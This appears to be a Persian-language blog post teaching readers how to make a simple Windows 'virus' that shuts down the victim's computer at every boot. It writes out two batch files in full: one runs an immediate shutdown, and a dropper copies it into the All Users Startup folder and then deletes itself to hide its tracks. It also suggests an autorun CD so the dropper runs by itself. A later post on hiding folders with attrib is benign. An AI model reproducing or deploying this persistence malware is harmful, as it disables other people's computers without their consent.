خب جریان از این قراره که میخایم یه کاری کنیم. که کامپیوتر طرف به محض راه اندازی خاموش بشه. یعنی تا ویندوز بالا اومد کامپیوتر خود به خود خاموش بشه که این کار خیلی هم راحت هست.

البته میتونیم کامپیوتر رو ری استارت و یا لوگ آف کنیم.

این دستور کامپیوتر رو خاموش می کنه.

shutdown /s /t 00

ما باید این دستور رو توی یه فایل بذاریم. و فایل رو توی استارت آپ ویندوز کپی کنیم.

هر چیزی که توی پوشه استارت آپ باشه موقع راه اندازی اجرا میشه. حالا اگه این فایل اجرا بشه کامپیوتر خاموش میشه.

در این دستور اگر به جای s/ از r/ استفاده کنیم. کامپیوتر ری استارت میشه.

و این دستور shutdown /l کامپیوتر رو لوگ آف میکنه.

برای گذاشتن این دستور توی یه فایل باید نوت پد ویندوز رو اجرا کنیم. این دستور رو توی نوت پد بنوسیم و بعو از منوی file گزینه save as رو انتخاب کنیم. و فایل رو با یه اسم و پسوند bat. ذخیره کنیم. مانند 1.bat

دستور echo off باعث میشود که دستورات واقع در فایل هنگام اجرا دیده نشوند.

ما دو تا فایل داریم یکی فایل ویروس که وقتی اجرا شد.کامپیوتر خاموش میشه و فایل دوم که باید فایل اصلی رو کپی کنه توی استارت اپ ویندوز فایل دوم بعد از یک بار اجرا شدن کار خودش رو میکنه و دیگه به درد ما نمیخوره پس باید پاک بشه تا رد پا نمونه. فایل اصلی هم بعد از کپی شدن توی استارت اپ باید از محل فعلیش پاک بشه.

این دستورات رو همینجوری توی نوت پد می نوسید. و با اسم داده شده ذخیره میکنید.

@echo off

@shutdown -s -t 00

این فایل ویروس اصلی هست. که با اسم 1.bat ذخیره میشه.

@echo off

@copy 1.bat "%homedrive%\Documents and Settings\All Users\Start Menu\Programs\Startup"

@del 1.bat

@del 2.bat

این فایل با اسم ۲.bat ذخیره میشه.

خب حالا باید این دو فایل پیش هم باشند.یعنی توی یه پوشه باشند.

با اجرا کردن فایل شماره ۲ تمام کارها انجام میشه.

میتونید این فایل رو روی سی دی رایت کنید و یه فایل autorun بسازید. که فایل شماره ۲ خود به خود از روی سی دی اجرا بشه. که برای اموزش این مطلب اینجا کلیک کنید.

برای غیر فعال کردن این ویروس باید این فایل از پوشه استارت اپ پاک بشه.

 برای جلوگیری از اجرا شدن این ویروس در هنگام راه اندازی ویندوز کلید شیفت را پایین نگه دارید.

این مطلب خیلی ساده بود. البته میشه کاری کرد که حتی با نگه داشتن شیفت ویروس اجرا بشه و میشه  فایل ویروس رو توی پوشه استارت اپ مخفی کرد که قابل دیدن نباشه و ۱۰۰۰ تا کار دیگه.

در صورتی که نظرات کافی باشند به نوشتن در باره این موضوع ادامه خواهم داد.

سلام امروز چهارشنبه ۲۰ تیر هست

اول از اقای ناطقی تشکر میکنم که نظر دادن و یه پیشنهاد هم دادن که در مورد پست قبلی با موضوع

اموزش قفل کردن پوشه ها این پیشنهاد رو دادن

با یه فرمان ساده مثل
attrib +h +s e:/a
(محل فایل مثال بود)
می تونیم فایل ها رو نا پدید کنیم
این که بهتره!

که باید بگم دستور attrib برای تعیین خصلت فایلها و پوشه ها هست که ما با این دستور خصلت پوشه رو به hidden و system یعنی مخفی و سیستمی تغییر میدیم که با این کار دیگه پوشه نمایش داده نمیشه و لازم نیست توی این دستور از s+ استفاده کنیم

عیب این روش این هست که توی ویندوز حتمی باید گزینه عدم نمایش فایلها و پوشه های مخفی رو انتخاب کرده باشیم تا پوشه مخفی باشه ولی اگر گزینه نمایش فایلها و پوشه های مخفی انتخاب شده باشه تمام فایلهای مخفی نشون داده میشن برای hidden کردن پوشه ها میشه روی پوشه مورد نظر کلیک کنیم و properties رو کلیک کنیم و از تب general گزینه hidden رو انتخاب کنیم (اینر روش راحت تر از روش نوشتن دستور هست) برای نمایش یا عدم نمایش فایلهای مخفی هم باید توی my computer روی تب tools کلیک کنیم و وارد folder option بشیم از کادر باز شده تب view رو انتخاب میکنیم بعد توی کادر تعدادی گزینه هست که یکی از اونها به نام do not show hidden files and folder برای عدم نمایش فایلها و پوشه های مخفی و بعدی show hidden files and folder برای نمایش فایلها و پوشه های مخفی هست

این روش رو خیلیها بلد هستن و اگر یه نفر که یه خورده از کامپیوتر سرش میشه بخاد چیزی رو که توی کامپیوتر هست پیدا کنه اولین کار

show hidden files and folder هست

اینم کد جلو گیری از کپی مطالب وبلاگ

 

http://www.hasssan.blogfa.com" style="text-decoration: none">
hasssan